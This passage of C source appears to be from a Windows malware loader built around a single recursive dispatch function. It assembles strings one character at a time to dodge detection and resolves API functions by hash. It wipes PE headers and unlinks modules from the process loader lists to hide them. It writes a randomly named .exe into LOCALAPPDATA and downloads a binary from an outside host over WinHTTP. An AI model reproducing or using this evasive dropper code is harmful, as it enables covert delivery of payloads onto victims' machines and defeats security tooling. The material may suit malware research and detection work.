  1411.                     Table->GeneralData.WideStringPointer1 = String;
  1412.                     RecursiveExecutor(StringLength, Table);
  1413.                     String += Table->dwGeneralUsage1;
  1414.  
  1415.                     if (TemporaryString.Length == Table->EnvironmentData.Name.Length)
  1416.                     {
  1417.                         for (LPCWSTR String1 = TemporaryString.Buffer, String2 = Table->EnvironmentData.Name.Buffer; *String1 == *String2; String1++, String2++)
  1418.                         {
  1419.                             if (*String1 == '\0')
  1420.                                 break;
  1421.  
  1422.                             if (((*(LPCWSTR)String1 < *(LPCWSTR)String2) ? -1 : +1) == TRUE)
  1423.                             {
  1424.                                 PBYTE Destination = (PBYTE)Table->GeneralData.UnicodeString.Buffer;
  1425.                                 PBYTE Source = (PBYTE)Value;
  1426.                                 SIZE_T Length = 0;
  1427.                                 Table->GeneralData.UnicodeString.Length = (USHORT)(String - Value) * sizeof(WCHAR);
  1428.  
  1429.                                 Length = (((Table->GeneralData.UnicodeString.Length + sizeof(WCHAR)) < (Table->GeneralData.UnicodeString.MaximumLength)) ? (Table->GeneralData.UnicodeString.Length + sizeof(WCHAR)) : (Table->GeneralData.UnicodeString.MaximumLength));
  1430.  
  1431.                                 while (Length--)
  1432.                                     *Destination++ = *Source++;
  1433.  
  1434.                                 break;
  1435.                             }
  1436.                         }
  1437.                     }
  1438.                 }
  1439.             }
  1440.  
  1441.             break;
  1442.         }
  1443.  
  1444.         case NullPeHeaders:
  1445.         {
  1446.             Table->LoaderHelper.Dos = 0;
  1447.             Table->LoaderHelper.Nt = 0;
  1448.             Table->LoaderHelper.File = 0;
  1449.             Table->LoaderHelper.Optional = 0;
  1450.             Table->LoaderHelper.hMod = 0;
  1451.             Table->GeneralData.StringPointer1 = 0;
  1452.  
  1453.             break;
  1454.         }
  1455.  
  1456.         case CreateDownloadPath:
  1457.         {
  1458.             WCHAR LocalAppDataW[MAX_PATH];
  1459.             WCHAR PayloadName[24];
  1460.             OBJECT_ATTRIBUTES Attributes;
  1461.             IO_STATUS_BLOCK Io;
  1462.             WCHAR NativePath[MAX_PATH * sizeof(WCHAR)];
  1463.             DWORD dwOffset = 0;
  1464.  
  1465.             CHAR ccRngBuffer[34];
  1466.  
  1467.             HANDLE hRngDevice;
  1468.             BYTE RngBuffer[16];
  1469.             WCHAR DriverNameBuffer[12];
  1470.             UNICODE_STRING DriverName;
  1471.  
  1472.             CHAR HexArray[17];
  1473.  
  1474.             Table->ZeroFill.Destination = &LocalAppDataW;
  1475.             Table->ZeroFill.Size = sizeof(LocalAppDataW);
  1476.             RecursiveExecutor(ZeroFillData, Table);
  1477.  
  1478.             Table->ZeroFill.Destination = &PayloadName;
  1479.             Table->ZeroFill.Size = sizeof(PayloadName);
  1480.             RecursiveExecutor(ZeroFillData, Table);
  1481.  
  1482.             Table->ZeroFill.Destination = &Attributes;
  1483.             Table->ZeroFill.Size = sizeof(OBJECT_ATTRIBUTES);
  1484.             RecursiveExecutor(ZeroFillData, Table);
  1485.  
  1486.             Table->ZeroFill.Destination = &NativePath;
  1487.             Table->ZeroFill.Size = sizeof(NativePath);
  1488.             RecursiveExecutor(ZeroFillData, Table);
  1489.  
  1490.             Table->ZeroFill.Destination = &ccRngBuffer;
  1491.             Table->ZeroFill.Size = sizeof(ccRngBuffer);
  1492.             RecursiveExecutor(ZeroFillData, Table);
  1493.  
  1494.             Table->ZeroFill.Destination = &RngBuffer;
  1495.             Table->ZeroFill.Size = sizeof(RngBuffer);
  1496.             RecursiveExecutor(ZeroFillData, Table);
  1497.  
  1498.             Table->ZeroFill.Destination = &DriverNameBuffer;
  1499.             Table->ZeroFill.Size = sizeof(DriverNameBuffer);
  1500.             RecursiveExecutor(ZeroFillData, Table);
  1501.  
  1502.             Table->ZeroFill.Destination = &DriverName;
  1503.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1504.             RecursiveExecutor(ZeroFillData, Table);
  1505.  
  1506.             Table->ZeroFill.Destination = &HexArray;
  1507.             Table->ZeroFill.Size = sizeof(HexArray);
  1508.             RecursiveExecutor(ZeroFillData, Table);
  1509.  
  1510.             Table->ZeroFill.Destination = &Io;
  1511.             Table->ZeroFill.Size = sizeof(IO_STATUS_BLOCK);
  1512.             RecursiveExecutor(ZeroFillData, Table);
  1513.  
  1514.             Table->dwGeneralUsage1 = 0;
  1515.             HexArray[Table->dwGeneralUsage1++] = '0'; HexArray[Table->dwGeneralUsage1++] = '1';
  1516.             HexArray[Table->dwGeneralUsage1++] = '2'; HexArray[Table->dwGeneralUsage1++] = '3';
  1517.             HexArray[Table->dwGeneralUsage1++] = '4'; HexArray[Table->dwGeneralUsage1++] = '5';
  1518.             HexArray[Table->dwGeneralUsage1++] = '6'; HexArray[Table->dwGeneralUsage1++] = '7';
  1519.             HexArray[Table->dwGeneralUsage1++] = '8'; HexArray[Table->dwGeneralUsage1++] = '9';
  1520.             HexArray[Table->dwGeneralUsage1++] = 'a'; HexArray[Table->dwGeneralUsage1++] = 'b';
  1521.             HexArray[Table->dwGeneralUsage1++] = 'c'; HexArray[Table->dwGeneralUsage1++] = 'd';
  1522.             HexArray[Table->dwGeneralUsage1++] = 'e'; HexArray[Table->dwGeneralUsage1++] = 'f';
  1523.  
  1524.             Table->dwGeneralUsage1 = 0;
  1525.             LocalAppDataW[Table->dwGeneralUsage1++] = 'L'; LocalAppDataW[Table->dwGeneralUsage1++] = 'O';
  1526.             LocalAppDataW[Table->dwGeneralUsage1++] = 'C'; LocalAppDataW[Table->dwGeneralUsage1++] = 'A';
  1527.             LocalAppDataW[Table->dwGeneralUsage1++] = 'L'; LocalAppDataW[Table->dwGeneralUsage1++] = 'A';
  1528.             LocalAppDataW[Table->dwGeneralUsage1++] = 'P'; LocalAppDataW[Table->dwGeneralUsage1++] = 'P';
  1529.             LocalAppDataW[Table->dwGeneralUsage1++] = 'D'; LocalAppDataW[Table->dwGeneralUsage1++] = 'A';
  1530.             LocalAppDataW[Table->dwGeneralUsage1++] = 'T'; LocalAppDataW[Table->dwGeneralUsage1++] = 'A';
  1531.  
  1532.             Table->dwGeneralUsage1 *= sizeof(WCHAR);
  1533.             Table->EnvironmentData.Name.Buffer = LocalAppDataW;
  1534.             Table->EnvironmentData.Name.Length = (USHORT)Table->dwGeneralUsage1;
  1535.             Table->EnvironmentData.Name.MaximumLength = (USHORT)Table->EnvironmentData.Name.Length + sizeof(WCHAR);
  1536.  
  1537.             Table->EnvironmentData.Environment = (PWSTR)Table->Peb->ProcessParameters->Environment;
  1538.  
  1539.             RecursiveExecutor(QueryEnvironmentVariables, Table);
  1540.  
  1541.             Table->dwGeneralUsage1 = 0;
  1542.             DriverNameBuffer[Table->dwGeneralUsage1++] = '\\'; DriverNameBuffer[Table->dwGeneralUsage1++] = 'D';
  1543.             DriverNameBuffer[Table->dwGeneralUsage1++] = 'e'; DriverNameBuffer[Table->dwGeneralUsage1++] = 'v';
  1544.             DriverNameBuffer[Table->dwGeneralUsage1++] = 'i'; DriverNameBuffer[Table->dwGeneralUsage1++] = 'c';
  1545.             DriverNameBuffer[Table->dwGeneralUsage1++] = 'e'; DriverNameBuffer[Table->dwGeneralUsage1++] = '\\';
  1546.             DriverNameBuffer[Table->dwGeneralUsage1++] = 'C'; DriverNameBuffer[Table->dwGeneralUsage1++] = 'N';
  1547.             DriverNameBuffer[Table->dwGeneralUsage1++] = 'G';
  1548.  
  1549.             Table->dwGeneralUsage1 *= sizeof(WCHAR);
  1550.             DriverName.Buffer = DriverNameBuffer;
  1551.             DriverName.Length = (USHORT)Table->dwGeneralUsage1;
  1552.             DriverName.MaximumLength = DriverName.Length + sizeof(WCHAR);
  1553.  
  1554.             InitializeObjectAttributes(&Attributes, &DriverName, OBJ_CASE_INSENSITIVE, NULL, NULL);
  1555.  
  1556.             Table->Status = Table->NtFunctions.NtCreateFile(&hRngDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &Io, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
  1557.             if (!NT_SUCCESS(Table->Status))
  1558.                 RecursiveExecutor(ExitApplication, Table);
  1559.  
  1560.             Table->Status = Table->NtFunctions.NtDeviceIoControlFile(hRngDevice, NULL, NULL, NULL, &Io, IOCTL_KSEC_RNG, NULL, 0, RngBuffer, 16);
  1561.             if (!NT_SUCCESS(Table->Status))
  1562.                 RecursiveExecutor(ExitApplication, Table);
  1563.  
  1564.             for (DWORD dwX = 0; dwX < 16; ++dwX)
  1565.             {
  1566.                 ccRngBuffer[2 * dwX] = HexArray[(RngBuffer[dwX] & 0xF0) >> 4];
  1567.                 ccRngBuffer[2 * dwX + 1] = HexArray[RngBuffer[dwX] & 0x0F];
  1568.             }
  1569.  
  1570.             PayloadName[0] = '\\';
  1571.             for (dwOffset = 0; dwOffset < 15; dwOffset++)
  1572.                 PayloadName[dwOffset + 1] = ccRngBuffer[dwOffset];
  1573.  
  1574.             Table->dwGeneralUsage1 = 0;
  1575.             PayloadName[dwOffset++] = '.';
  1576.             PayloadName[dwOffset++] = 'e';
  1577.             PayloadName[dwOffset++] = 'x';
  1578.             PayloadName[dwOffset++] = 'e';
  1579.  
  1580.             NativePath[Table->dwGeneralUsage1++] = '\\';
  1581.             NativePath[Table->dwGeneralUsage1++] = '?';
  1582.             NativePath[Table->dwGeneralUsage1++] = '?';
  1583.             NativePath[Table->dwGeneralUsage1++] = '\\';
  1584.  
  1585.             for (DWORD dwIndex = 0; dwIndex < Table->GeneralData.UnicodeString.Length; dwIndex++)
  1586.             {
  1587.                 dwOffset = dwIndex + Table->dwGeneralUsage1;
  1588.                 NativePath[dwOffset] = Table->GeneralData.UnicodeString.Buffer[dwIndex];
  1589.             }
  1590.  
  1591.             for (DWORD dwIndex = 0, Ordinal = 0; Ordinal < (dwOffset / sizeof(WCHAR)); dwIndex++)
  1592.             {
  1593.                 if (NativePath[dwIndex] == '\0')
  1594.                 {
  1595.                     NativePath[dwIndex] = PayloadName[Ordinal];
  1596.                     Ordinal++;
  1597.                 }
  1598.             }
  1599.  
  1600.             Table->GeneralData.WideStringPointer1 = NativePath;
  1601.             RecursiveExecutor(StringLength, Table);
  1602.             Table->dwGeneralUsage1 *= sizeof(WCHAR);
  1603.  
  1604.             for (PBYTE Destination = (PBYTE)Table->GeneralData.UnicodeStringBuffer, Source = (PBYTE)NativePath; Table->dwGeneralUsage1 != 0; Table->dwGeneralUsage1--)
  1605.                 *Destination++ = *Source++;
  1606.  
  1607.             Table->GeneralData.WideStringPointer1 = Table->GeneralData.UnicodeStringBuffer;
  1608.             RecursiveExecutor(StringLength, Table);
  1609.             Table->dwGeneralUsage1 *= sizeof(WCHAR);
  1610.             Table->GeneralData.UnicodeString.Length = (USHORT)Table->dwGeneralUsage1;
  1611.             Table->GeneralData.UnicodeString.MaximumLength = Table->GeneralData.UnicodeString.Length + sizeof(WCHAR);
  1612.  
  1613.             InitializeObjectAttributes(&Attributes, &Table->GeneralData.UnicodeString, OBJ_CASE_INSENSITIVE, 0, NULL);
  1614.  
  1615.             Table->Status = Table->NtFunctions.NtCreateFile(&Table->hHandle, FILE_WRITE_DATA | FILE_READ_DATA | SYNCHRONIZE, &Attributes, &Io, 0, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
  1616.             if (!NT_SUCCESS(Table->Status))
  1617.                 RecursiveExecutor(ExitApplication, Table);
  1618.  
  1619.             if (hRngDevice)
  1620.                 Table->NtFunctions.NtClose(hRngDevice);
  1621.  
  1622.             break;
  1623.         }
  1624.  
  1625.         case PopulateComFunctionPointers:
  1626.         {
  1627.             Table->dwGeneralUsage1 = 0x4cacfe40; //CoInitializeEx
  1628.             Table->ComHelper.ComFunction.CoInitializeEx = (COINITIALIZEEX)RecursiveExecutor(GetProcAddressByHash, Table);
  1629.                            
  1630.             Table->dwGeneralUsage1 = 0xa0f3063e; //CoUninitialize
  1631.             Table->ComHelper.ComFunction.CoUninitialize = (COUNINITIALIZE)RecursiveExecutor(GetProcAddressByHash, Table);
  1632.  
  1633.             Table->dwGeneralUsage1 = 0xa1f07e4c; //CoCreateInstance
  1634.             Table->ComHelper.ComFunction.CoCreateInstance = (COCREATEINSTANCE)RecursiveExecutor(GetProcAddressByHash, Table);
  1635.  
  1636.             Table->dwGeneralUsage1 = 0xbea555a3; //CoInitializeSecurity
  1637.             Table->ComHelper.ComFunction.CoInitializeSecurity = (COINITIALIZESECURITY)RecursiveExecutor(GetProcAddressByHash, Table);
  1638.  
  1639.             break;
  1640.         }
  1641.  
  1642.         case DownloadBinary:
  1643.         {
  1644.             CLSID WinhttpRequest;
  1645.  
  1646.             WCHAR MethodBuffer[5]; BSTR Method;
  1647.             WCHAR UrlBuffer[MAX_PATH * sizeof(WCHAR)]; BSTR Url;
  1648.  
  1649.             PBYTE DataBuffer = NULL;
  1650.  
  1651.             VARIANT AsyncFlag; ((&AsyncFlag)->vt) = VT_EMPTY;
  1652.             VARIANT Body; ((&Body)->vt) = VT_EMPTY;
  1653.  
  1654.             typedef struct {
  1655.                 DWORD dwPad;
  1656.                 DWORD dwSize;
  1657.                 union {
  1658.                     CHAR Pointer[1];
  1659.                     WCHAR String[1];
  1660.                     DWORD dwPointer[1];
  1661.                 } u;
  1662.             } BSTR_T;
  1663.  
  1664.             IO_STATUS_BLOCK Io;
  1665.  
  1666.             Table->ZeroFill.Destination = &MethodBuffer;
  1667.             Table->ZeroFill.Size = sizeof(MethodBuffer);
  1668.             RecursiveExecutor(ZeroFillData, Table);
  1669.  
  1670.             Table->ZeroFill.Destination = &UrlBuffer;
  1671.             Table->ZeroFill.Size = sizeof(UrlBuffer);
  1672.             RecursiveExecutor(ZeroFillData, Table);
  1673.  
  1674.             Table->ZeroFill.Destination = &Io;
  1675.             Table->ZeroFill.Size = sizeof(IO_STATUS_BLOCK);
  1676.             RecursiveExecutor(ZeroFillData, Table);
  1677.            
  1678.             Table->bFlag = FALSE;
  1679.             Table->dwGeneralUsage1 = 0;
  1680.             RecursiveExecutor(LoadComLibraries, Table);
  1681.  
  1682.             RecursiveExecutor(NullPeHeaders, Table);
  1683.  
  1684.             Table->dwGeneralUsage1 = 0;
  1685.             WinhttpRequest.Data1 = 0x2087c2f4;
  1686.             WinhttpRequest.Data2 = 0x2cef;
  1687.             WinhttpRequest.Data3 = 0x4953;
  1688.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0xa8;
  1689.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0xab;
  1690.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0x66;
  1691.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0x77;
  1692.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0x9b;
  1693.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0x67;
  1694.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0x04;
  1695.             WinhttpRequest.Data4[Table->dwGeneralUsage1++] = 0x95;
  1696.             Table->dwGeneralUsage1 = 0;
  1697.            
  1698.             Table->ComHelper.ComResult = Table->ComHelper.ComFunction.CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
  1699.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1700.                 RecursiveExecutor(ExitApplication, Table);
  1701.             else
  1702.                 Table->ComHelper.IsComInitialized = TRUE;
  1703.  
  1704.             Table->ComHelper.ComResult = Table->ComHelper.ComFunction.CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
  1705.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1706.                 RecursiveExecutor(ExitApplication, Table);
  1707.  
  1708.             RecursiveExecutor(CheckLocalMachinesInternetStatus, Table);
  1709.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1710.                 RecursiveExecutor(ExitApplication, Table);
  1711.  
  1712.             RecursiveExecutor(CheckRemoteHost, Table);
  1713.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1714.                 RecursiveExecutor(ExitApplication, Table);
  1715.  
  1716.             Table->ComHelper.ComResult = Table->ComHelper.ComFunction.CoCreateInstance(WinhttpRequest, NULL, CLSCTX_INPROC_SERVER, IID_IWinHttpRequest, (PVOID*)&Table->ComHelper.ComVariables.HttpRequest);
  1717.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1718.                 RecursiveExecutor(ExitApplication, Table);
  1719.  
  1720.             Table->dwGeneralUsage1 = 0;
  1721.             MethodBuffer[Table->dwGeneralUsage1++] = 'G';
  1722.             MethodBuffer[Table->dwGeneralUsage1++] = 'E';
  1723.             MethodBuffer[Table->dwGeneralUsage1++] = 'T';
  1724.             MethodBuffer[Table->dwGeneralUsage1++] = '\0';
  1725.  
  1726.             Table->dwGeneralUsage1 = 0;
  1727.             UrlBuffer[Table->dwGeneralUsage1++] = 'h'; UrlBuffer[Table->dwGeneralUsage1++] = 't';
  1728.             UrlBuffer[Table->dwGeneralUsage1++] = 't'; UrlBuffer[Table->dwGeneralUsage1++] = 'p';
  1729.             UrlBuffer[Table->dwGeneralUsage1++] = 's'; UrlBuffer[Table->dwGeneralUsage1++] = ':';
  1730.             UrlBuffer[Table->dwGeneralUsage1++] = '/'; UrlBuffer[Table->dwGeneralUsage1++] = '/';
  1731.             UrlBuffer[Table->dwGeneralUsage1++] = 's'; UrlBuffer[Table->dwGeneralUsage1++] = 'a';
  1732.             UrlBuffer[Table->dwGeneralUsage1++] = 'm'; UrlBuffer[Table->dwGeneralUsage1++] = 'p';
  1733.             UrlBuffer[Table->dwGeneralUsage1++] = 'l'; UrlBuffer[Table->dwGeneralUsage1++] = 'e';
  1734.             UrlBuffer[Table->dwGeneralUsage1++] = 's'; UrlBuffer[Table->dwGeneralUsage1++] = '.';
  1735.             UrlBuffer[Table->dwGeneralUsage1++] = 'v'; UrlBuffer[Table->dwGeneralUsage1++] = 'x';
  1736.             UrlBuffer[Table->dwGeneralUsage1++] = '-'; UrlBuffer[Table->dwGeneralUsage1++] = 'u';
  1737.             UrlBuffer[Table->dwGeneralUsage1++] = 'n'; UrlBuffer[Table->dwGeneralUsage1++] = 'd';
  1738.             UrlBuffer[Table->dwGeneralUsage1++] = 'e'; UrlBuffer[Table->dwGeneralUsage1++] = 'r';
  1739.             UrlBuffer[Table->dwGeneralUsage1++] = 'g'; UrlBuffer[Table->dwGeneralUsage1++] = 'r';
  1740.             UrlBuffer[Table->dwGeneralUsage1++] = 'o'; UrlBuffer[Table->dwGeneralUsage1++] = 'u';
  1741.             UrlBuffer[Table->dwGeneralUsage1++] = 'n'; UrlBuffer[Table->dwGeneralUsage1++] = 'd';
  1742.             UrlBuffer[Table->dwGeneralUsage1++] = '.'; UrlBuffer[Table->dwGeneralUsage1++] = 'o';
  1743.             UrlBuffer[Table->dwGeneralUsage1++] = 'r'; UrlBuffer[Table->dwGeneralUsage1++] = 'g';
  1744.             UrlBuffer[Table->dwGeneralUsage1++] = '/'; UrlBuffer[Table->dwGeneralUsage1++] = 'r';
  1745.             UrlBuffer[Table->dwGeneralUsage1++] = 'o'; UrlBuffer[Table->dwGeneralUsage1++] = 'o';
  1746.             UrlBuffer[Table->dwGeneralUsage1++] = 't'; UrlBuffer[Table->dwGeneralUsage1++] = '/';
  1747.             UrlBuffer[Table->dwGeneralUsage1++] = 'S'; UrlBuffer[Table->dwGeneralUsage1++] = 'a';
  1748.             UrlBuffer[Table->dwGeneralUsage1++] = 'm'; UrlBuffer[Table->dwGeneralUsage1++] = 'p';
  1749.             UrlBuffer[Table->dwGeneralUsage1++] = 'l'; UrlBuffer[Table->dwGeneralUsage1++] = 'e';
  1750.             UrlBuffer[Table->dwGeneralUsage1++] = 's'; UrlBuffer[Table->dwGeneralUsage1++] = '/';
  1751.             UrlBuffer[Table->dwGeneralUsage1++] = 'c'; UrlBuffer[Table->dwGeneralUsage1++] = 'm';
  1752.             UrlBuffer[Table->dwGeneralUsage1++] = 'd'; UrlBuffer[Table->dwGeneralUsage1++] = '.';
  1753.             UrlBuffer[Table->dwGeneralUsage1++] = 'e'; UrlBuffer[Table->dwGeneralUsage1++] = 'x';
  1754.             UrlBuffer[Table->dwGeneralUsage1++] = 'e'; UrlBuffer[Table->dwGeneralUsage1++] = '\0';
  1755.  
  1756.             Method = MethodBuffer;
  1757.             Url = UrlBuffer;
  1758.  
  1759.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.HttpRequest->Open(Method, Url, AsyncFlag);
  1760.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1761.                 RecursiveExecutor(ExitApplication, Table);
  1762.  
  1763.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.HttpRequest->Send(Body);
  1764.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1765.                 RecursiveExecutor(ExitApplication, Table);
  1766.  
  1767.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.HttpRequest->get_ResponseText(&Table->ComHelper.ComVariables.ResponseData);
  1768.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  1769.                 RecursiveExecutor(ExitApplication, Table);
  1770.  
  1771.             Table->dwGeneralUsage1 = 0;
  1772.             Table->dwGeneralUsage1 = (CONTAINING_RECORD((PVOID)Table->ComHelper.ComVariables.ResponseData, BSTR_T, u.String)->dwSize / sizeof(WCHAR));
  1773.  
  1774.             Table->dwReturn = Table->dwGeneralUsage1;
  1775.             Table->Status = Table->NtFunctions.NtAllocateVirtualMemory(((HANDLE)-1), &DataBuffer, 0, (PSIZE_T)&Table->dwGeneralUsage1, MEM_COMMIT, PAGE_READWRITE);
  1776.             if (!NT_SUCCESS(Table->Status))
  1777.                 RecursiveExecutor(ExitApplication, Table);
  1778.            
  1779.             for (DWORD dwX = 0; dwX < Table->dwGeneralUsage1; dwX++)
  1780.                 DataBuffer[dwX] = (BYTE)Table->ComHelper.ComVariables.ResponseData[dwX];
  1781.            
  1782.             Table->Status = Table->NtFunctions.NtWriteFile(Table->hHandle, NULL, NULL, NULL, &Io, DataBuffer, Table->dwGeneralUsage1, NULL, NULL);
  1783.  
  1784.             if (Table->ComHelper.ComVariables.ResponseData)
  1785.                 Table->ComHelper.ComFunction.SysFreeString(Table->ComHelper.ComVariables.ResponseData);
  1786.  
  1787.             if (Table->ComHelper.ComVariables.HttpRequest)
  1788.                 Table->ComHelper.ComVariables.HttpRequest->Release();
  1789.  
  1790.             if (Table->ComHelper.IsComInitialized)
  1791.             {
  1792.                 Table->ComHelper.ComFunction.CoUninitialize();
  1793.                 Table->ComHelper.IsComInitialized = FALSE;
  1794.             }
  1795.  
  1796.             if (DataBuffer)
  1797.                 Table->NtFunctions.NtFreeVirtualMemory(((HANDLE)-1), DataBuffer, 0, MEM_RELEASE);
  1798.  
  1799.             if (Table->hHandle)
  1800.                 Table->NtFunctions.NtClose(Table->hHandle);
  1801.  
  1802.             RecursiveExecutor(RemoveComData, Table);
  1803.  
  1804.             if (!NT_SUCCESS(Table->Status))
  1805.                 RecursiveExecutor(ExitApplication, Table);
  1806.  
  1807.             break;
  1808.         }
  1809.  
  1810.         case LoadComLibraries:
  1811.         {
  1812.             WCHAR CombaseBuffer[20];
  1813.             UNICODE_STRING CombaseString;
  1814.             Table->LoaderHelper.hMod = NULL;
  1815.  
  1816.             Table->ZeroFill.Destination = &CombaseBuffer;
  1817.             Table->ZeroFill.Size = sizeof(CombaseBuffer);
  1818.             RecursiveExecutor(ZeroFillData, Table);
  1819.  
  1820.             Table->ZeroFill.Destination = &CombaseString;
  1821.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1822.             RecursiveExecutor(ZeroFillData, Table);
  1823.  
  1824.             Table->dwGeneralUsage1 = 0;
  1825.             CombaseBuffer[Table->dwGeneralUsage1++] = 'C';
  1826.             CombaseBuffer[Table->dwGeneralUsage1++] = 'o';
  1827.             CombaseBuffer[Table->dwGeneralUsage1++] = 'm';
  1828.             CombaseBuffer[Table->dwGeneralUsage1++] = 'b';
  1829.             CombaseBuffer[Table->dwGeneralUsage1++] = 'a';
  1830.             CombaseBuffer[Table->dwGeneralUsage1++] = 's';
  1831.             CombaseBuffer[Table->dwGeneralUsage1++] = 'e';
  1832.             CombaseBuffer[Table->dwGeneralUsage1++] = '.';
  1833.             CombaseBuffer[Table->dwGeneralUsage1++] = 'd';
  1834.             CombaseBuffer[Table->dwGeneralUsage1++] = 'l';
  1835.             CombaseBuffer[Table->dwGeneralUsage1++] = 'l';
  1836.  
  1837.             CombaseString.Buffer = CombaseBuffer;
  1838.             CombaseString.Length = (USHORT)Table->dwGeneralUsage1 * sizeof(WCHAR);
  1839.             CombaseString.MaximumLength = CombaseString.Length + sizeof(WCHAR);
  1840.  
  1841.             Table->Status = Table->NtFunctions.LdrLoadDll(NULL, 0, &CombaseString, &Table->LoaderHelper.hMod);
  1842.             if (!NT_SUCCESS(Table->Status))
  1843.                 RecursiveExecutor(ExitApplication, Table);
  1844.  
  1845.             RecursiveExecutor(PopulateComFunctionPointers, Table);
  1846.  
  1847.             if(!Table->ComHelper.ComFunction.CoCreateInstance || !Table->ComHelper.ComFunction.CoInitializeEx || !Table->ComHelper.ComFunction.CoUninitialize)
  1848.                 RecursiveExecutor(ExitApplication, Table);
  1849.  
  1850.             RecursiveExecutor(GetSysFreeString, Table);
  1851.  
  1852.             RecursiveExecutor(NullPeHeaders, Table);
  1853.  
  1854.             break;
  1855.         }
  1856.  
  1857.         case GetSysFreeString:
  1858.         {
  1859.             WCHAR OleAut32Buffer[13];
  1860.             UNICODE_STRING OleAut32String;
  1861.             Table->LoaderHelper.hMod = NULL;
  1862.  
  1863.             Table->ZeroFill.Destination = &OleAut32Buffer;
  1864.             Table->ZeroFill.Size = sizeof(OleAut32Buffer);
  1865.             RecursiveExecutor(ZeroFillData, Table);
  1866.  
  1867.             Table->ZeroFill.Destination = &OleAut32String;
  1868.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1869.             RecursiveExecutor(ZeroFillData, Table);
  1870.  
  1871.             Table->dwGeneralUsage1 = 0;
  1872.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'O';
  1873.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'l';
  1874.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'e';
  1875.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'A';
  1876.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'u';
  1877.             OleAut32Buffer[Table->dwGeneralUsage1++] = 't';
  1878.             OleAut32Buffer[Table->dwGeneralUsage1++] = '3';
  1879.             OleAut32Buffer[Table->dwGeneralUsage1++] = '2';
  1880.             OleAut32Buffer[Table->dwGeneralUsage1++] = '.';
  1881.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'd';
  1882.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'l';
  1883.             OleAut32Buffer[Table->dwGeneralUsage1++] = 'l';
  1884.  
  1885.             Table->dwGeneralUsage1 *= sizeof(WCHAR);
  1886.             OleAut32String.Buffer = OleAut32Buffer;
  1887.             OleAut32String.Length = (USHORT)Table->dwGeneralUsage1;
  1888.             OleAut32String.MaximumLength = OleAut32String.Length + sizeof(WCHAR);
  1889.  
  1890.             Table->Status = Table->NtFunctions.LdrLoadDll(NULL, 0, &OleAut32String, &Table->LoaderHelper.hMod);
  1891.             if (!NT_SUCCESS(Table->Status))
  1892.                 RecursiveExecutor(ExitApplication, Table);
  1893.  
  1894.             Table->dwGeneralUsage1 = 0x14c944f5;
  1895.             Table->ComHelper.ComFunction.SysFreeString = (SYSFREESTRING)RecursiveExecutor(GetProcAddressByHash, Table);
  1896.  
  1897.             if (!Table->ComHelper.ComFunction.SysFreeString)
  1898.                 RecursiveExecutor(ExitApplication, Table);
  1899.  
  1900.             break;
  1901.         }
  1902.  
  1903.         case UnloadDll:
  1904.         {
  1905.             PLDR_MODULE Module = NULL;
  1906.             PLIST_ENTRY Head = &Table->Peb->LoaderData->InMemoryOrderModuleList;
  1907.             PLIST_ENTRY Next = Head->Flink;
  1908.             Module = (PLDR_MODULE)((PBYTE)Next - 16);
  1909.  
  1910.             while (Next != Head)
  1911.             {
  1912.                 Module = (PLDR_MODULE)((PBYTE)Next - 16);
  1913.                 if (Module->BaseDllName.Buffer != NULL)
  1914.                 {
  1915.                     Table->GeneralData.WideStringPointer1 = Module->BaseDllName.Buffer;
  1916.  
  1917.                     RecursiveExecutor(HashStringFowlerNollVoVariant1aW, Table);
  1918.  
  1919.                     if (Table->dwReturn == Table->dwGeneralUsage1)
  1920.                     {
  1921.                         Table->Entry = &Module->InLoadOrderModuleList;
  1922.                         RecursiveExecutor(RemoveListEntry, Table);
  1923.  
  1924.                         Table->Entry = &Module->InInitializationOrderModuleList;
  1925.                         RecursiveExecutor(RemoveListEntry, Table);
  1926.  
  1927.                         Table->Entry = &Module->InMemoryOrderModuleList;
  1928.                         RecursiveExecutor(RemoveListEntry, Table);
  1929.  
  1930.                         Table->Entry = &Module->HashTableEntry;
  1931.                         RecursiveExecutor(RemoveListEntry, Table);
  1932.  
  1933.                         break;
  1934.                     }
  1935.                 }
  1936.  
  1937.                 Next = Next->Flink;
  1938.             }
  1939.  
  1940.             break;
  1941.         }
  1942.  
  1943.         case RemoveListEntry:
  1944.         {
  1945.             PLIST_ENTRY OldFlink, OldBlink;
  1946.  
  1947.             OldFlink = Table->Entry->Flink;
  1948.             OldBlink = Table->Entry->Blink;
  1949.             OldFlink->Blink = OldBlink;
  1950.             OldBlink->Flink = OldFlink;
  1951.             Table->Entry->Flink = NULL;
